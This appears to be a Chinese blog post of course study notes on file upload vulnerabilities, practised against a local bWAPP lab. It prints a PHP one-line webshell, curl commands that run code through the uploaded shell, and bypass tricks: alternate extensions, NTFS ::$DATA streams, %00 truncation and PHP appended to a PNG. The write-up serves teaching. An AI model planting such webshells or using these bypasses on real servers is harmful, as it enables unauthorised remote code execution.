<!DOCTYPE html>
<html lang="zh-CN">





<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/favicon-apple.png">
  <link rel="icon" type="image/png" href="/img/favicon.png">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="">
  <meta name="author" content="Tachiu Lam">
  <meta name="keywords" content="">
  <title>《Web攻防安全实战》学习总结：文件上传漏洞 - Tachiu Lam</title>

  <link  rel="stylesheet" href="https://cdn.staticfile.org/twitter-bootstrap/4.4.1/css/bootstrap.min.css" />
<link  rel="stylesheet" href="https://cdn.staticfile.org/github-markdown-css/4.0.0/github-markdown.min.css" />


  <link  rel="stylesheet" href="https://cdn.staticfile.org/highlight.js/10.0.0/styles/github-gist.min.css" />


<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_fmb4a04yx8h.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_pjno9b9zyxs.css">




<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


<meta name="generator" content="Hexo 4.2.1"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>TachiuLam's emmm...</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          <li class="nav-item">
            <a class="nav-link" href="/">
              <i class="iconfont icon-home-fill"></i>
              首页</a>
          </li>
        
          
          
          
          <li class="nav-item">
            <a class="nav-link" href="/archives/">
              <i class="iconfont icon-archive-fill"></i>
              归档</a>
          </li>
        
          
          
          
          <li class="nav-item">
            <a class="nav-link" href="/categories/">
              <i class="iconfont icon-category-fill"></i>
              分类</a>
          </li>
        
          
          
          
          <li class="nav-item">
            <a class="nav-link" href="/tags/">
              <i class="iconfont icon-tags-fill"></i>
              标签</a>
          </li>
        
          
          
          
          <li class="nav-item">
            <a class="nav-link" href="/about/">
              <i class="iconfont icon-user-fill"></i>
              关于</a>
          </li>
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" data-toggle="modal" data-target="#modalSearch">&nbsp;&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="view intro-2" id="background" parallax=true
         style="background: url('/img/websecurity.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="container text-center white-text fadeInUp">
            <span class="h2" id="subtitle">
              
            </span>

            
              
                <div class="mt-3 post-meta">
                  <i class="iconfont icon-date-fill" aria-hidden="true"></i>
                  <time datetime="2020-12-05 14:36">
                    2020年12月5日 下午
                  </time>
                </div>
              

              <div class="mt-1">
                
                  
                  <span class="post-meta mr-2">
                    <i class="iconfont icon-chart"></i>
                    1.9k 字
                  </span>
                

                
                  
                  <span class="post-meta mr-2">
                      <i class="iconfont icon-clock-fill"></i>
                    
                    
                    22
                     分钟
                  </span>
                

                
              </div>
            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid">
  <div class="row">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-md">
      <div class="container nopadding-md" id="board-ctn">
        <div class="py-5" id="board">
          <div class="post-content mx-auto" id="post">
            
              <p class="note note-info">
                
                  本文最后更新于：2021年1月2日 下午
                
              </p>
            
            <article class="markdown-body">
              <h1 id="文件上传漏洞"><a href="#文件上传漏洞" class="headerlink" title="文件上传漏洞"></a>文件上传漏洞</h1><h2 id="1、漏洞原理：Webshell"><a href="#1、漏洞原理：Webshell" class="headerlink" title="1、漏洞原理：Webshell"></a>1、漏洞原理：Webshell</h2><p>webshell，顾名思义：web指的是在web服务器上，而shell是用脚本语言编写的脚本程序，webshell就是就是web的一个管理工具，可以对web服务器进行操作的权限。<br>webshell根据脚本可以分为PHP脚本木马，ASP脚本木马，也有基于.NET的脚本木马和JSP脚本木马。<br>关键函数：以php为例，eval（），执行用户输入的函数。</p>
<h2 id="2、一句话木马"><a href="#2、一句话木马" class="headerlink" title="2、一句话木马"></a>2、一句话木马</h2><h3 id="2-1-php一句话木马"><a href="#2-1-php一句话木马" class="headerlink" title="2.1 php一句话木马"></a>2.1 php一句话木马</h3><pre><code class="hljs plain">&lt;?php @eval($_POST[&#39;hacker&#39;]);?&gt;</code></pre>
<p>获取post请求中hacker字段的值，并将该值转换为php代码执行；</p>
<h2 id="3、后缀名绕过"><a href="#3、后缀名绕过" class="headerlink" title="3、后缀名绕过"></a>3、后缀名绕过</h2><h3 id="3-1-php文件后缀名绕过"><a href="#3-1-php文件后缀名绕过" class="headerlink" title="3.1 php文件后缀名绕过"></a>3.1 php文件后缀名绕过</h3><p>apache、nginx等web服务器会加载一些语言解析器模块，如python、php、asp等，当某个特定的文件后缀名被限制上传的时候，我们就可以根据web server的解析原理，修改文件后缀名，达到绕过限制的目的，但不是所有的后缀名都能被web server解析，下面通过实战模拟探究下绕过的原理</p>
<h2 id="4、Windows文件流特性绕过"><a href="#4、Windows文件流特性绕过" class="headerlink" title="4、Windows文件流特性绕过"></a>4、Windows文件流特性绕过</h2><p>Windows平台使用NTFS文件流，NTFS环境一个文件默认使用的是未命名文件流，同时可创建其他命令的文件流，Windows资源管理器默认不显示出文件的命名文件流。举例：<br>1）在任一NTFS分区下打开CMD命令提示符，输入echo abcde&gt;&gt;a.txt:b.txt，则在当前目录下会生成一个名为a.txt的文件，但文件的大小为0字节，打开后也无任何内容，只有输入命令：notepad a.txt:b.txt 才能看见写入的abcde<br>2）在上边的命令中，a.txt可以不存在，也可以是某个已存的文件，文件格式无所谓，无论是.txt还是.jpg|.exe|.asp都行；b.txt也可以任意指定文件名以及后缀名。（可以将任意文本信息隐藏于任意文件中，只要不泄露冒号后的虚拟文件名(即b.txt)，别人是根本不会查看到隐藏信息的）<br>3）包含隐藏信息的文件仍然可以继续隐藏其它的内容，对比上例，我们仍然可以使用命令echo 12345&gt;&gt;a.txt:c.txt　给a.txt建立新的隐藏信息的流文件，使用命令notepad a.txt:c.txt　打开后会发现12345这段信息，而abcde仍然存在于a.txt:b.txt中丝毫不受影响。<br>当我们访问a.asp::$DATA 时，就是请求 a.asp 本身的数据，如果a.asp 还包含了其他的数据流，比如 a.asp:lake2.asp，请求 a.asp:lake2.asp::$DATA，则是请求a.asp中的流数据lake2.asp的流数据内容。<br>例如当.php后缀当文件类型被黑名单限制时，可以通过拦截数据包，将文件名修改为shell.php::$DATA当方式进行绕过。</p>
<h2 id="5、-00阶段绕过"><a href="#5、-00阶段绕过" class="headerlink" title="5、%00阶段绕过"></a>5、%00阶段绕过</h2><p>如果后端在处理上传文件的保存过程，是以路径拼接的方式，且路径是从前端获取，就可以采取路径截断的方式绕过白名单。具体手法是利用burpsuite，在我们想要截断的位置，进入十六进制，添加00截断符号。具体实现见实战模拟。</p>
<h2 id="6、文件头检测绕过"><a href="#6、文件头检测绕过" class="headerlink" title="6、文件头检测绕过"></a>6、文件头检测绕过</h2><p>每种文件头格式都有对应的十六进制和自负的编码形式。比如png格式的文件头标识符是89 50 4E 47，git格式的文件头标识符是47 49 46 38。在面对具有文件内容检测的上传功能时，我们可以将攻击代码和图片等文件进行聚合，实现既满足文件头检测，又可成功执行代码的效果。</p>
<h2 id="7、文件上传源码审计"><a href="#7、文件上传源码审计" class="headerlink" title="7、文件上传源码审计"></a>7、文件上传源码审计</h2><p>逻辑代码安全性&amp;调用函数安全性</p>
<h2 id="8、Fuzz"><a href="#8、Fuzz" class="headerlink" title="8、Fuzz"></a>8、Fuzz</h2><p>burpsuite —— send to intruder<br>需要准备字典 </p>
<h1 id="实战模拟"><a href="#实战模拟" class="headerlink" title="实战模拟"></a>实战模拟</h1><h2 id="环境搭建"><a href="#环境搭建" class="headerlink" title="环境搭建"></a>环境搭建</h2><pre><code class="hljs plain"># 第一次启动
docker pull registry.cn-shanghai.aliyuncs.com&#x2F;yhskc&#x2F;bwapp
docker run -d -p 0.0.0.0:80:80 registry.cn-shanghai.aliyuncs.com&#x2F;yhskc&#x2F;bwapp

# 根据课程中的演示搭建好 bWAPP 实验环境后，以后再启动 bWAPP
docker container list -a # 查看 container id
docker start xxx # xxx 就是上一步获得的 container id，运行完这条命令后，访问响应的网址即可</code></pre>

<h2 id="一句话木马上传"><a href="#一句话木马上传" class="headerlink" title="一句话木马上传"></a>一句话木马上传</h2><p>初始化bwapp，过程省略，选择文件上传漏洞 Unrestricted File Upload，按下图操作，上传一句话木马文件，并复制上传后服务器返回的文件保存地址<br><img src="/img/fileupload1.gif" srcset="/img/loading.gif" alt="fileupload"><br>构造一句话木马，在POST请求的hacker字段中写入我们希望服务器执行的代码，利用curl工具构造post请求：</p>
<pre><code class="hljs plain">curl -d &quot;hacker&#x3D;echo get_current_user();&quot; http:&#x2F;&#x2F;127.0.0.1:8888&#x2F;images&#x2F;shell.php
curl -d &quot;hacker&#x3D;echo getcwd();&quot; http:&#x2F;&#x2F;127.0.0.1:8888&#x2F;images&#x2F;shell.php</code></pre>
<p>此处介绍两个php api<br>get_current_user()：获取服务所属用户名<br>getcwd()：获取当前执行目录<br>操作见下图，服务器成功返回了用户名www-data及当前执行目录/app/images</p>
<p><img src="/img/fileupload2.gif" srcset="/img/loading.gif" alt="fileupload"></p>
<h2 id="文件名后缀绕过"><a href="#文件名后缀绕过" class="headerlink" title="文件名后缀绕过"></a>文件名后缀绕过</h2><p>将文件上传等级设置为 medium，上传文件后缀为php时，显示被拦截，如下：<br><img src="/img/hz.gif" srcset="/img/loading.gif" alt="fileupload"><br>将shell.php文件后缀修改为php3和php30，上传php3后缀文件时，可成功绕过后缀名限制<br><img src="/img/hz3.png" srcset="/img/loading.gif" alt="fileupload"><br>上传shell.php30文件，服务器将文件当作txt文本进行了处理，直接打印了文件内容<br><img src="/img/hz.png" srcset="/img/loading.gif" alt="fileupload"><br>通过web server的配置文件，探究文件名绕过的原理；bwapp使用的web server是apache，通过配置文件可以了解到apache的语言解析模块文件路径</p>
<pre><code class="hljs plain">vim &#x2F;etc&#x2F;apache2&#x2F;apache2.conf</code></pre>
<p><img src="/img/apcf.png" srcset="/img/loading.gif" alt="fileupload"><br>进入对应的语言解析模块配置文件：</p>
<pre><code class="hljs plain">vim &#x2F;etc&#x2F;apache2&#x2F;mods-enabled&#x2F;php5.conf</code></pre>

<p><img src="/img/phpconf.png" srcset="/img/loading.gif" alt="fileupload"><br>通过配置文件可发现，php、php3、php5、phptml等文件后缀都可以被apache服务器解析，这也就是为什么刚刚上传的php3文件可被执行，php30不能被执行的原因。了解了文件名后缀的绕过原理，我们就可以通过上传不同的后缀名文件来达到文件后缀名限制绕过的目的。</p>
<h2 id="00截断绕过"><a href="#00截断绕过" class="headerlink" title="%00截断绕过"></a>%00截断绕过</h2><p>首先上传shell.php.jpg，文件可成功上传。<br><img src="/img/jieduan2.png" srcset="/img/loading.gif" alt="fileupload"><br><img src="/img/jieduan1.png" srcset="/img/loading.gif" alt="fileupload"><br>由于这个上传点的文件路径和文件名可控，因此考虑在php后进行截断，实现我们要上传的文件类型，同时满足文件类型校验。<br>首先利用burpsuite拦截上传请求，利用16进制输入文件截断符 00，因为键盘输入不了这个符号；同时便于查找位置，我们输入 空格（16进制数是20），便于查找需要修改的位置。将 空格20 修改为 00进行截断。可发现空格消失，同时在png后面移动光标时会发现存在一个隐藏字符，即需要移动两次才到达 .jpg 位置。<br><img src="/img/jieduan3.png" srcset="/img/loading.gif" alt="fileupload"><br><img src="/img/jieduan4.png" srcset="/img/loading.gif" alt="fileupload"><br><img src="/img/jieduan5.png" srcset="/img/loading.gif" alt="fileupload"><br><img src="/img/jieduan6.png" srcset="/img/loading.gif" alt="fileupload"><br>取消burpsuite拦截，文件成功上传，点击here查看，文件名被成功截断且修改为shell.png<br><img src="/img/jieduan7.png" srcset="/img/loading.gif" alt="fileupload"></p>
<h2 id="文件头检测绕过"><a href="#文件头检测绕过" class="headerlink" title="文件头检测绕过"></a>文件头检测绕过</h2><p>以php语言为例，首先准备一个普通的png格式文件，查看文件内容，文件头标志符号是完整的：<br><img src="/img/filehead.png" srcset="/img/loading.gif" alt="fileupload"><br>再准备一个用于测试的php文件，功能是输出‘test’字符串：<br><img src="/img/filehead2.png" srcset="/img/loading.gif" alt="fileupload"><br>将php文件内容追加到png文件内：</p>
<pre><code class="hljs plain">cat test.php &gt;&gt; filetype.png</code></pre>
<p><img src="/img/filehead3.png" srcset="/img/loading.gif" alt="fileupload"><br>利用php，解析png文件，php代码被成功执行，说明我们可以通过把图片和代码进行聚合的方式，让它既满足文件头的标准校验，又满足代码的执行。<br><img src="/img/filehead4.png" srcset="/img/loading.gif" alt="fileupload"></p>

            </article>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                  <div class="post-meta mr-3">
                    <i class="iconfont icon-category"></i>
                    
                      <a class="hover-with-bg" href="/categories/Web%E5%AE%89%E5%85%A8/">Web安全</a>
                    
                      <a class="hover-with-bg" href="/categories/Web%E5%AE%89%E5%85%A8/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E/">文件上传漏洞</a>
                    
                  </div>
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/%E5%AE%89%E5%85%A8/">安全</a>
                    
                      <a class="hover-with-bg" href="/tags/Web%E5%AE%89%E5%85%A8/">Web安全</a>
                    
                  </div>
                
              </div>
              
                <p class="note note-warning">本博客所有文章除特别声明外，均采用 <a href="https://zh.wikipedia.org/wiki/Wikipedia:CC_BY-SA_3.0%E5%8D%8F%E8%AE%AE%E6%96%87%E6%9C%AC" target="_blank" rel="nofollow noopener noopener">CC BY-SA 3.0协议</a> 。转载请注明出处！</p>
              
              
                <div class="post-prevnext row">
                  <div class="post-prev col-6">
                    
                    
                      <a href="/2020/12/27/%E3%80%8AWeb%E5%AE%89%E5%85%A8%E6%94%BB%E9%98%B2%E5%AE%9E%E6%88%98%E3%80%8B%E5%AD%A6%E4%B9%A0%E6%80%BB%E7%BB%93%EF%BC%9ASQL%E6%B3%A8%E5%85%A5%E5%8E%9F%E7%90%86/">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">《Web攻防安全实战》学习总结：SQL注入原理</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </div>
                  <div class="post-next col-6">
                    
                    
                      <a href="/2020/11/20/%E3%80%8ALinux%E6%80%A7%E8%83%BD%E4%BC%98%E5%8C%96%E5%AE%9E%E6%88%98%E3%80%8B%E5%AD%A6%E4%B9%A0%E6%80%BB%E7%BB%93%EF%BC%9A1-8%E8%AE%B2/">
                        <span class="hidden-mobile">《Linux性能优化实战》学习总结：1-8讲</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </div>
                </div>
              
            </div>

            
          </div>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div id="tocbot"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    
  </main>

  
    <a id="scroll-top-button" href="#" role="button">
      <i class="iconfont icon-arrowup" aria-hidden="true"></i>
    </a>
  

  
    <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
  

  

  

  <footer class="mt-5">
  <div class="text-center py-3">
    <div>
      <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a>
      <i class="iconfont icon-love"></i>
      <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener">
        <span>Fluid</span></a>
    </div>
    

    

    
  <span id="timeDate">载入天数...</span>
  <span id="times">载入时分秒...</span>
  <script>
  var now = new Date();
  function createtime(){
      var grt= new Date("05/22/2020 00:00:00");//此处修改你的建站时间或者网站上线时间
      now.setTime(now.getTime()+250);
      days = (now - grt ) / 1000 / 60 / 60 / 24;
      dnum = Math.floor(days);
      hours = (now - grt ) / 1000 / 60 / 60 - (24 * dnum);
      hnum = Math.floor(hours);
      if(String(hnum).length ==1 ){
          hnum = "0" + hnum;
      }
      minutes = (now - grt ) / 1000 /60 - (24 * 60 * dnum) - (60 * hnum);
      mnum = Math.floor(minutes);
      if(String(mnum).length ==1 ){
                mnum = "0" + mnum;
      }
      seconds = (now - grt ) / 1000 - (24 * 60 * 60 * dnum) - (60 * 60 * hnum) - (60 * mnum);
      snum = Math.round(seconds);
      if(String(snum).length ==1 ){
                snum = "0" + snum;
      }
      document.getElementById("timeDate").innerHTML = "本站勉强安全运行&nbsp"+dnum+"&nbsp天";
      document.getElementById("times").innerHTML = hnum + "&nbsp小时&nbsp" + mnum + "&nbsp分&nbsp" + snum + "&nbsp秒";
  }
  setInterval("createtime()",250);
  </script>
</div>
</footer>

<!-- SCRIPTS -->
<script  src="https://cdn.staticfile.org/jquery/3.4.1/jquery.min.js" ></script>
<script  src="https://cdn.staticfile.org/twitter-bootstrap/4.4.1/js/bootstrap.min.js" ></script>
<script  src="/js/main.js" ></script>


  <script  src="/js/lazyload.js" ></script>



  
  <script  src="https://cdn.staticfile.org/tocbot/4.11.1/tocbot.min.js" ></script>
  <script>
    $(document).ready(function () {
      var boardCtn = $('#board-ctn');
      var boardTop = boardCtn.offset().top;

      tocbot.init({
        tocSelector: '#tocbot',
        contentSelector: '.post-content',
        headingSelector: 'h1,h2,h3,h4,h5,h6',
        linkClass: 'tocbot-link',
        activeLinkClass: 'tocbot-active-link',
        listClass: 'tocbot-list',
        isCollapsedClass: 'tocbot-is-collapsed',
        collapsibleClass: 'tocbot-is-collapsible',
        collapseDepth: 0,
        scrollSmooth: true,
        headingsOffset: -boardTop
      });
      if ($('.toc-list-item').length > 0) {
        $('#toc').css('visibility', 'visible');
      }
    });
  </script>





  <script defer src="https://cdn.staticfile.org/clipboard.js/2.0.6/clipboard.min.js" ></script>
  <script  src="/js/clipboard-use.js" ></script>






<!-- Plugins -->


  

  

  
    <!-- Tencent Analytics -->
    <script defer>
      var _mtac = {};
      (function () {
        var mta = document.createElement("script");
        mta.src = "//pingjs.qq.com/h5/stats.js?v2.0.4";
        mta.setAttribute("name", "MTAH5");
        mta.setAttribute("sid", "500720703");
        
        mta.setAttribute("cid", "500720705");
        
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(mta, s);
      })();
    </script>
  

  

  

  



  <script  src="https://cdn.staticfile.org/typed.js/2.0.11/typed.min.js" ></script>
  <script>
    var typed = new Typed('#subtitle', {
      strings: [
        '  ',
        "《Web攻防安全实战》学习总结：文件上传漏洞&nbsp;",
      ],
      cursorChar: "_",
      typeSpeed: 70,
      loop: false,
    });
    typed.stop();
    $(document).ready(function () {
      $(".typed-cursor").addClass("h2");
      typed.start();
    });
  </script>



  <script  src="https://cdn.staticfile.org/anchor-js/4.2.2/anchor.min.js" ></script>
  <script>
    anchors.options = {
      placement: "right",
      visible: "hover",
      
    };
    var el = "h1,h2,h3,h4,h5,h6".split(",");
    var res = [];
    for (item of el) {
      res.push(".markdown-body > " + item)
    }
    anchors.add(res.join(", "))
  </script>



  <script  src="/js/local-search.js" ></script>
  <script>
    var path = "/local-search.xml";
    var inputArea = document.querySelector("#local-search-input");
    inputArea.onclick = function () {
      searchFunc(path, 'local-search-input', 'local-search-result');
      this.onclick = null
    }
  </script>



  <script  src="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.css" />

  <script>
    $('#post img:not(.no-zoom img, img[no-zoom]), img[zoom]').each(
      function () {
        var element = document.createElement('a');
        $(element).attr('data-fancybox', 'images');
        $(element).attr('href', $(this).attr('src'));
        $(this).wrap(element);
      }
    );
  </script>


















</body>
</html>
